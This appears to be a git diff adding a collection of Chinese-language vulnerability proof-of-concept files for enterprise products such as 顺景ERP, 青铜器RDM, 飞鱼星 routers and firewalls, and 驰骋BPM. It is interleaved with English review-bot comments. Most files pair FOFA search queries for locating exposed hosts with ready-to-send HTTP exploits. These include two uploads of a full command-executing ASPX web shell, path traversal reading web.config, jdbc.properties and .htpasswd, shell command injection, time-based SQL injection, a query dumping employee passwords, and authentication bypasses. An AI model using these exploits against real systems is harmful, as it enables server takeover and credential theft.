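Review bot: a file titled 权限提升漏洞 contains only a vendor Lua excerpt (`save_python_info`, `get_python_ver`) with no description of the trigger, affected version or fix; as written the reader must infer that `proc.path` taken from the process list is interpolated into `cmdline` and handed to `common.execute_shell` without validation. Spell out that data flow in prose, and note the excerpt is not valid Lua as pasted (`End` capitalised on the last line, `return "" end` joined on one line), so label it an abridged quotation rather than a runnable PoC.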
@@ -0,0 +1,53 @@ +# 青铜器RDM研发管理平台upload存在任意文件上传漏洞 + +# 一、漏洞简介 +深圳市青铜器软件系统有限公司,创业团队一直专注于提供产品创新和研发管理整体解决方案。公司在深入研究企业研发管理信息化需求的基础上,开发出针对完全拥有自主知识产权的研发管理软件RDM系列版本。青铜器RDM研发管理平台upload存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 青铜器RDM研发管理平台 + +# 三、资产测绘 ++ fofa`body="/images/rdm.ico"` ++ 特征 + +![1712747446071-d672a11c-d403-40f5-ac90-89531045ad74.png](./img/uHZ6EwiBMeFVWmE3/1712747446071-d672a11c-d403-40f5-ac90-89531045ad74-317515.png) + +# 四、漏洞复现 +```java +POST /upload?dir=cmVwb3NpdG9yeQ==&name=ZGVtby5qc3A=&start=0&size=7000 HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Content-Type: multipart/form-data; boundary=00content0boundary00 +Host: +Cookie: JSESSIONID=AB3CC11444E566879F70BE78C0C518CA +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 260 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="poc.jsp" +Content-Type: application/octet-stream + +<%out.println("1234");%> +--00content0boundary00 +Content-Disposition: form-data; name="Submit" + +Go +--00content0boundary00-- +``` + +![1712747466309-473fb061-9d40-499b-bffc-ddd89079dc84.png](./img/uHZ6EwiBMeFVWmE3/1712747466309-473fb061-9d40-499b-bffc-ddd89079dc84-945013.png) + +文件上传位置 + +```java +GET /repository/000000000/demo.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +``` + +![1712747538656-73854cfa-7c54-4377-96b2-1f5665114773.png](./img/uHZ6EwiBMeFVWmE3/1712747538656-73854cfa-7c54-4377-96b2-1f5665114773-676572.png) + + + +> 更新: 2024-04-20 22:03:39 +> 原文: \ No newline at end of file diff --git a/顺景ERP管理系统FileUpload存在任意文件上传漏洞.md b/顺景ERP管理系统FileUpload存在任意文件上传漏洞.md new file mode 100644 index 0000000..475635f --- /dev/null +++ b/顺景ERP管理系统FileUpload存在任意文件上传漏洞.md 
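Review bot: the query string `dir=cmVwb3NpdG9yeQ==&name=ZGVtby5qc3A=` is base64 for the target directory and file name (`repository`, `demo.jsp`), which is why the multipart `filename="poc.jsp"` is ignored and the file surfaces as `/repository/000000000/demo.jsp`; the text should say this explicitly and explain the `000000000` path component. The HTTP requests are fenced with the `java` tag, and the text should state whether `Cookie: JSESSIONID=...` is required at all (if not, drop it; if so, use a placeholder). A mitigation section is missing.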
@@ -0,0 +1,33 @@ +# 顺景ERP管理系统FileUpload存在任意文件上传漏洞 + +顺景ERP管理系统FileUpload存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +body="/api/DBRecord/getDBRecords" +``` + +## poc + +```javascript +POST /api/FileUpload/Upload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7yyQ5XLHOn6WZ6MT +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Connection: close + +------WebKitFormBoundary7yyQ5XLHOn6WZ6MT +Content-Disposition: form-data; name="file"; filename="1.aspx" +Content-Type: image/png + +<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%> +------WebKitFormBoundary7yyQ5XLHOn6WZ6MT-- +``` + +![image-20241106224458205](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062244260.png) + +文件路径`/UpFiles/GUID值.aspx?cmd=whoami` \ No newline at end of file diff --git a/顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞.md b/顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞.md new file mode 100644 index 0000000..71ad4b5 --- /dev/null +++ b/顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞.md 
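Review bot: the uploaded body is a complete command-executing web shell (`System.Diagnostics.ProcessStartInfo("cmd")` driven by `Request.Item["cmd"]`), far more than is needed to confirm an unrestricted upload; use a benign marker such as the `<% response.write("1111")%>` body the sibling `UploadInvtSpFile` file uses, after which a reader only needs the `/UpFiles/<GUID>.aspx` location. The text also does not say where the GUID is obtained or whether the endpoint requires authentication, and there is no 影响版本 or mitigation.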
@@ -0,0 +1,31 @@ +# 顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞 + +顺景ERP管理系统UploadInvtSpBuzPlanFile存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +body="/api/DBRecord/getDBRecords" +``` + +## poc + +```javascript +POST /api/cgInvtSp/UploadInvtSpBuzPlanFile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7yyQ5XLHOn6WZ6MT +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Connection: close + +------WebKitFormBoundary7yyQ5XLHOn6WZ6MT +Content-Disposition: form-data; name="file"; filename="1.aspx" +Content-Type: image/png + +<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%> +------WebKitFormBoundary7yyQ5XLHOn6WZ6MT-- +``` + +![image-20241106224316632](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062243710.png) \ No newline at end of file diff --git a/顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md b/顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md new file mode 100644 index 0000000..d7ccb12 --- /dev/null +++ b/顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md 
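Review bot: this hunk is the FileUpload file with only the path changed to `/api/cgInvtSp/UploadInvtSpBuzPlanFile`, again carrying the full `cmd`-executing ASPX body as the payload; the same comment applies (use a harmless marker body). It also omits where the stored file ends up, which the sibling file gives as `/UpFiles/GUID值.aspx`, so the reproduction is incomplete as written.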
@@ -0,0 +1,33 @@ +# 顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞 + +顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +body="/api/DBRecord/getDBRecords" +``` + +## poc + +```javascript +POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1 +Host: +Content-Type: multipart/form-data; boundary=-----------------1111 +Content-Length: 178 + +-------------------1111 +Content-Disposition: form-data; name="filedata"; filename="2142142142.asp" +Content-Type: image/png + +<% response.write("1111")%> +-------------------1111-- +``` + +![ebb92616e1835d80e80f6c6cb97ee814](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111921995.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/BrbgHxUO4GJ0Haza5xf6dQ \ No newline at end of file diff --git a/顺景ERP系统FullGuidFileName任意文件读取漏洞.md b/顺景ERP系统FullGuidFileName任意文件读取漏洞.md new file mode 100644 index 0000000..ad0f35f --- /dev/null +++ b/顺景ERP系统FullGuidFileName任意文件读取漏洞.md @@ -0,0 +1,24 @@ +# 顺景ERP系统FullGuidFileName任意文件读取漏洞 + +顺景ERP是一款功能全面、高度集成、易于扩展的企业管理软件,能够帮助制造企业实现智能化、精益化管理,提升企业的竞争力和盈利能力。为企业提供全方位信息化的管理应用与支持,例如,在精密五金行业,系统可根据企业的业务流程及特性提供针对性信息化管理方案;在注塑行业,系统具有完整的水口料管理方案,对企业成本控制严谨到位;在电子行业,系统的BOM批量变更功能,能快速准确进行物料变更,并支持替代料功能等。顺景ERP TMScmQuote/GetFile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +body="/api/DBRecord/getDBRecords" +body="顺景软件 WebAPI 服务端" +``` + +## poc + +```javascript +GET /api/TMScmQuote/GetFile?FullGuidFileName=/../web.config&FileName= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241211205713046](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112057111.png) diff --git a/顺景ERP系统GetFile任意文件读取漏洞.md b/顺景ERP系统GetFile任意文件读取漏洞.md new file mode 100644 index 0000000..b93dffa 
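Review bot: in the `UploadInvtSpFile` hunk the multipart field is `name="filedata"` whereas the two sibling 顺景 upload files use `name="file"`; state whether the field name matters, since a defender writing a detection rule will otherwise key on the wrong name. In the `FullGuidFileName` hunk the 简介 repeats `数据库配置文件` twice in one sentence, names the endpoint `TMScmQuote/GetFile` while the title names the parameter, and the fofa block lists two queries on separate lines without saying whether they are alternatives; the empty `FileName=` parameter in the request is unexplained.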
--- /dev/null +++ b/顺景ERP系统GetFile任意文件读取漏洞.md @@ -0,0 +1,24 @@ +# 顺景ERP系统GetFile任意文件读取漏洞 + +顺景ERP是一款功能全面、高度集成、易于扩展的企业管理软件,能够帮助制造企业实现智能化、精益化管理,提升企业的竞争力和盈利能力。为企业提供全方位信息化的管理应用与支持,例如,在精密五金行业,系统可根据企业的业务流程及特性提供针对性信息化管理方案;在注塑行业,系统具有完整的水口料管理方案,对企业成本控制严谨到位;在电子行业,系统的BOM批量变更功能,能快速准确进行物料变更,并支持替代料功能等。顺景ERP Download/GetFile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +body="/api/DBRecord/getDBRecords" +body="顺景软件 WebAPI 服务端" +``` + +## poc + +```javascript +GET /api/Download/GetFile?FileName=/../web.config&Title= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241128093802818](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280938886.png) diff --git a/飞企互联-FE-业务协作平台存在参数文件读取漏洞-.md b/飞企互联-FE-业务协作平台存在参数文件读取漏洞-.md new file mode 100644 index 0000000..df0d32b --- /dev/null +++ b/飞企互联-FE-业务协作平台存在参数文件读取漏洞-.md @@ -0,0 +1,11 @@ +## 飞企互联 FE 业务协作平台存在参数文件读取漏洞 + +## fofa +``` +app="飞企互联-FE企业运营管理平台" +``` + +## poc +``` +/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print +``` diff --git a/飞讯云供应链平台MyImportData前台SQL注入.md b/飞讯云供应链平台MyImportData前台SQL注入.md new file mode 100644 index 0000000..decc202 --- /dev/null +++ b/飞讯云供应链平台MyImportData前台SQL注入.md 
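Review bot: the 飞企互联 hunk has no description at all, only a fofa query and a path, and the trailing `&print` parameter is unexplained; add at least a one-line 简介 (what `ShowImageServlet` is meant to serve, why `imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties` is reachable) plus affected version and mitigation. The `GetFile` hunk copies the FullGuidFileName 简介 verbatim, including the duplicated `数据库配置文件` phrase, with only `Download/GetFile` substituted.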
@@ -0,0 +1,38 @@ +# 飞讯云供应链平台MyImportData 前台SQL注入 + +# ke一、漏洞简介 +WMS系统是借助条码、移动设备、互联网等技术实现仓库收、发、存等作业流程的自动化、和数字化的信息管理系统,旨在帮助客户解决库存分类管理和实时监控、仓库延迟录入和账务不符、仓储作业效率和作业合规、物料批次管理和库存库龄预警等问题,实现降低内部存货风险,提高企业的资金流转,促进产、销、供与财务端间的有效协同和提升仓库库容率和仓储运作效率的目标。 飞讯云WMS系统存在SQL注入,成功利用该漏洞可获取敏感信息,造成远程代码执行。 + +# 二、影响版本 ++ 飞讯云WMS + +# 三、资产测绘 ++ fofa`icon_hash="-2088130336"``body="wx8ccb75857bd3e985"` ++ 特征 + +![1721892431875-70ae1713-fa25-4875-b9f0-de4a891b31f2.png](./img/ZJLY5lae1UPP7ur9/1721892431875-70ae1713-fa25-4875-b9f0-de4a891b31f2-603050.png) + +# 四、漏洞复现 +```plain +GET /MyDown/MyImportData?opeid=%27+WAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br, zstd +Connection: keep-alive +Cookie: JSESSIONID=83a23f73-2908-4424-abd9-6b044cdfe003; Language=zh-CN +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Priority: u=0, i +``` + +![1721892461788-574ec73d-01c4-4aea-b83a-ca51a265c5a1.png](./img/ZJLY5lae1UPP7ur9/1721892461788-574ec73d-01c4-4aea-b83a-ca51a265c5a1-340837.png) + + + +> 更新: 2024-08-12 17:15:59 +> 原文: \ No newline at end of file diff --git a/飞鱼星-路由器存在敏感信息泄露漏洞.md b/飞鱼星-路由器存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..c3624fe --- /dev/null +++ b/飞鱼星-路由器存在敏感信息泄露漏洞.md 
@@ -0,0 +1,21 @@ +# 飞鱼星-路由器存在敏感信息泄露漏洞 +成都飞鱼星科技股份有限公司成立于2002年,公司现有全场景(行业)无线网络解决方案、公安审计解决方案、星云平台、企业级无线路由器、企业上网行为管理路由、智能家居解决方案、全屋Wi-Fi覆盖方案、安防监控交换机等产品及方案,致力于提供智能易用的网络通讯产品与服务,通过创新技术不断提升网络使用质量,为用户创建智能、高效、人性化的网络管理平台。飞鱼星-路由器存在敏感信息泄露漏洞 + +## fofa +```javascript +body="js/select2css.js" +``` + +## poc +```javascript +GET /js/../.htpasswd HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734321644321-511c2e49-d340-4575-a1cb-8fc98e0aa304.png) + diff --git a/飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md b/飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md new file mode 100644 index 0000000..7f3f1f8 --- /dev/null +++ b/飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md 
@@ -0,0 +1,41 @@ +# 飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞 + +# 一、漏洞简介 +飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 飞鱼星下一代防火墙安全网关 + +# 三、资产测绘 ++ hunter`web.title="下一代防火墙安全网关"&&web.body="./webui/js/jquerylib/"` ++ 特征 + +![1703406555367-82625773-f5ee-47db-a94e-a974cf2112bf.png](./img/3hKIFGXdPlbXJRDM/1703406555367-82625773-f5ee-47db-a94e-a974cf2112bf-028450.png) + +# 四、漏洞复现 +```plain +GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703406610179-b013056a-1211-4fb4-83ba-6718a16f1150.png](./img/3hKIFGXdPlbXJRDM/1703406610179-b013056a-1211-4fb4-83ba-6718a16f1150-394370.png) + +获取命令执行结果 + +```plain +GET /sslvpn/stc.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703406632394-be847ae6-b195-4974-bd17-5b3ccbe76f2c.png](./img/3hKIFGXdPlbXJRDM/1703406632394-be847ae6-b195-4974-bd17-5b3ccbe76f2c-297158.png) + + + +> 更新: 2024-09-03 14:56:23 +> 原文: \ No newline at end of file diff --git a/飞鱼星家用智能路由存在敏感信息泄露漏洞.md b/飞鱼星家用智能路由存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..82b7ca1 --- /dev/null +++ b/飞鱼星家用智能路由存在敏感信息泄露漏洞.md 
@@ -0,0 +1,31 @@ +# 飞鱼星家用智能路由存在敏感信息泄露漏洞 + +# 一、漏洞详情 +飞鱼星家用智能路由存在敏感信息泄露漏洞 + +# 二、影响版本 ++ 飞鱼星家用智能路由 + +# 三、资产测绘 ++ fofa`title="飞鱼星家用智能路由"` ++ 特征 + +![1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7.png](./img/Ak2FNPPxjNY5naA1/1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7-503451.png) + +# 四、漏洞复现 +```http +GET /request_para.cgi?parameter=wifi_info HTTP/1.1 +Host: +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: application/json, text/javascript, */*; q=0.01 +``` + +![1719500556398-d9e3207a-fdb4-4fbb-8e58-ad526533c975.png](./img/Ak2FNPPxjNY5naA1/1719500556398-d9e3207a-fdb4-4fbb-8e58-ad526533c975-527172.png) + + + +> 更新: 2024-09-03 14:56:23 +> 原文: \ No newline at end of file diff --git a/飞鱼星家用智能路由存在权限绕过漏洞.md b/飞鱼星家用智能路由存在权限绕过漏洞.md new file mode 100644 index 0000000..e173568 --- /dev/null +++ b/飞鱼星家用智能路由存在权限绕过漏洞.md @@ -0,0 +1,26 @@ +# 飞鱼星家用智能路由存在权限绕过漏洞 + +# 一、漏洞详情 +飞鱼星家用智能路由存在权限绕过漏洞 + +# 二、影响版本 ++ 飞鱼星家用智能路由 + +# 三、资产测绘 ++ fofa`title="飞鱼星家用智能路由"` + +![1719500481297-cc6eb011-dc89-4927-9a7d-f1cda4f19459.png](./img/Y8HpEzdRmOBnMfKt/1719500481297-cc6eb011-dc89-4927-9a7d-f1cda4f19459-130632.png) + +# 四、漏洞复现 +```plain +/index.html +``` + +看见/cookie.cgi时,丢弃即可进入后台 + +![1719498557012-c056c25e-abfa-4699-a939-ee754e115eb8.jpeg](./img/Y8HpEzdRmOBnMfKt/1719498557012-c056c25e-abfa-4699-a939-ee754e115eb8-380445.jpeg)![1719500276585-2ee27808-7c21-41af-91fd-53a76c11fb15.png](./img/Y8HpEzdRmOBnMfKt/1719500276585-2ee27808-7c21-41af-91fd-53a76c11fb15-759001.png) + + + +> 更新: 2024-09-03 14:56:23 +> 原文: \ No newline at end of file diff --git a/飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞.md b/飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞.md new file mode 100644 index 0000000..c298ae7 --- /dev/null +++ b/飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞.md 
@@ -0,0 +1,36 @@ +# 飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞 + +# 一、漏洞详情 +飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 飞鱼星智能上网行为管理系统 + +# 三、资产测绘 ++ fofa`title="飞鱼星企业级智能上网行为管理系统"` ++ 特征 + +![1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7.png](./img/SzODbDuHutGaSVyR/1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7-151278.png) + +# 四、漏洞复现 +```plain +POST /send_order.cgi?parameter=operation HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 62 + +{"opid":"777777777777777777","name":";id;echo;","type":"rest"} +``` + +![1710904029519-91bc1ada-e0fd-41c8-842a-20a097fc13ab.png](./img/SzODbDuHutGaSVyR/1710904029519-91bc1ada-e0fd-41c8-842a-20a097fc13ab-193394.png) + + + +> 更新: 2024-09-03 14:56:23 +> 原文: \ No newline at end of file diff --git a/飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞.md b/飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..15bc16c --- /dev/null +++ b/飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞.md 
@@ -0,0 +1,37 @@ +# 飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞 + +# 一、漏洞详情 +飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞 + +# 二、影响版本 ++ 飞鱼星智能上网行为管理系统 + +# 三、资产测绘 ++ fofa`title="飞鱼星企业级智能上网行为管理系统"` ++ 特征 + +![1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7.png](./img/9AG4ORDV7IedqzFz/1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7-769660.png) + +# 四、漏洞复现 +```plain +/request_para.cgi?parameter=wifi_info +``` + +![1719499181319-44ab815f-87e4-4cb2-b72d-0148d1a1af29.png](./img/9AG4ORDV7IedqzFz/1719499181319-44ab815f-87e4-4cb2-b72d-0148d1a1af29-508727.png) + +```plain +/request_para.cgi?parameter=wifi_get_5g_host +``` + +![1719499500867-37ec082b-126b-4b69-a318-1bce91a416df.png](./img/9AG4ORDV7IedqzFz/1719499500867-37ec082b-126b-4b69-a318-1bce91a416df-114550.png) + +```plain +/request_para.cgi?parameter=wifi_get_2g_host +``` + +![1719499611173-9f2abb60-be50-4582-ba17-dab541a20841.png](./img/9AG4ORDV7IedqzFz/1719499611173-9f2abb60-be50-4582-ba17-dab541a20841-304644.png) + + + +> 更新: 2024-09-03 14:56:23 +> 原文: \ No newline at end of file diff --git a/飞鱼星智能上网行为管理系统存在权限绕过漏洞.md b/飞鱼星智能上网行为管理系统存在权限绕过漏洞.md new file mode 100644 index 0000000..f949dc6 --- /dev/null +++ b/飞鱼星智能上网行为管理系统存在权限绕过漏洞.md @@ -0,0 +1,29 @@ +# 飞鱼星智能上网行为管理系统存在权限绕过漏洞 + +# 一、漏洞详情 +飞鱼星智能上网行为管理系统存在权限绕过漏洞 + +# 二、影响版本 ++ 飞鱼星智能上网行为管理系统 + +# 三、资产测绘 ++ fofa`title="飞鱼星企业级智能上网行为管理系统"` ++ 特征 + +![1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7.png](./img/Td-ceWJhfx7Y6drZ/1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7-927499.png) + +# 四、漏洞复现 +```plain +/home/index.html +``` + +看见/cookie.cgi时,丢弃即可进入后台 + +![1719498557012-c056c25e-abfa-4699-a939-ee754e115eb8.jpeg](./img/Td-ceWJhfx7Y6drZ/1719498557012-c056c25e-abfa-4699-a939-ee754e115eb8-695055.jpeg) + +![1719498461827-6823975c-d37a-4730-92a6-2daa19add176.png](./img/Td-ceWJhfx7Y6drZ/1719498461827-6823975c-d37a-4730-92a6-2daa19add176-664040.png) + + + +> 更新: 2024-09-03 14:56:23 +> 原文: \ No newline at end of file 
diff --git a/驰骋BPMRunSQL_Init存在SQL注入漏洞.md b/驰骋BPMRunSQL_Init存在SQL注入漏洞.md new file mode 100644 index 0000000..4430d42 --- /dev/null +++ b/驰骋BPMRunSQL_Init存在SQL注入漏洞.md @@ -0,0 +1,42 @@ +# 驰骋BPM RunSQL_Init存在SQL注入漏洞 + +# 一、漏洞简介 +驰骋BPM是一款功能强大的业务流程管理平台,可提供可视化的设计界面和灵活的流程配置,帮助企业轻松构建、管理和优化各类业务流程。驰骋BPM RunSQL_Init存在SQL注入漏洞,攻击者可通过该漏洞获取账号密码。 + +# 二、影响版本 ++ 驰骋BPM + +# 三、资产测绘 ++ fofa`body="/WF/AppClassic/Home.htm"` ++ 特征 + +![1723125316153-028df4e8-8d0c-4914-95e3-5fce485c6535.png](./img/xmBRbQspfgDUagT5/1723125316153-028df4e8-8d0c-4914-95e3-5fce485c6535-202430.png) + +# 四、漏洞复现 +```plain +POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1 +Accept: application/json, text/plain, */* +Accept-Encoding: gzip, deflate +Accept-Ldwk: bG91ZG9uZ3dlbmt1 +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +Content-Length: 160 +Content-Type: multipart/form-data; boundary=----123128312312389898yd98ays98d +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 + +------123128312312389898yd98ays98d +Content-Disposition: form-data; name="SQL" + +SELECT No,Pass FROM Port_Emp +------123128312312389898yd98ays98d-- +``` + +![1723125347422-b5c92bda-6742-4924-97dd-db99687877ee.png](./img/xmBRbQspfgDUagT5/1723125347422-b5c92bda-6742-4924-97dd-db99687877ee-419982.png) + +![1723125358177-e60f1d03-f1e7-44df-801d-aa9dfe0884e2.png](./img/xmBRbQspfgDUagT5/1723125358177-e60f1d03-f1e7-44df-801d-aa9dfe0884e2-311837.png) + + + +> 更新: 2024-08-12 17:15:57 +> 原文: \ No newline at end of file diff --git a/高校人力资源管理系统ReportServer存在敏感信息泄露漏洞.md b/高校人力资源管理系统ReportServer存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..1bab403 --- /dev/null +++ b/高校人力资源管理系统ReportServer存在敏感信息泄露漏洞.md 
